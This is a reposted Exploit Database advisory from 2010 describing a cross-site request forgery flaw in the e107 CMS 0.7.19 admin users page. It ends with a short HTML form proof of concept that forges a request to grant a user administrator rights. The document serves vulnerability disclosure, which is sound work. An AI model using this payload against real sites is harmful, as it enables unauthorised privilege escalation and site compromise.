e107 CMS 0.7.19 – Cross-Site Request Forgery

• Exploit Database
• 35 阅读

• 作者： High-Tech Bridge SA
  日期： 2010-04-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12319/

• Vulnerability ID: HTB22344
  
  Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_e107.html
  
  Product: e107 Website System
  
  Vendor: e107
  
  Vulnerable Version: 0.7.19 and Probably Prior Versions Vendor Notification:
  05 April 2010 Vulnerability Type: CSRF (Cross-Site Request Forgery)
  
  Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level:
  Medium
  
  Credit: High-Tech Bridge SA (http://www.htbridge.ch/)
  
  
  
  Vulnerability Details:
  
  The vulnerability exists due to failure in the /e107_admin/users.php script
  to properly verify the source of HTTP request.
  
  
  
  Successful exploitation of this vulnerability could result in a compromise
  of the application, disclosure or modification of sensitive data.
  
  
  
  Attacker can use browser to exploit this vulnerability. The following PoC is
  available:
  
  
  
  
  
  <form method=POST action=http://host/e107_admin/users.php name=main> <input
  type=hidden name=userid value=2> <input type=hidden name=userip
  value=1.2.3.4> <input type=hidden name=useraction value=admin> </form>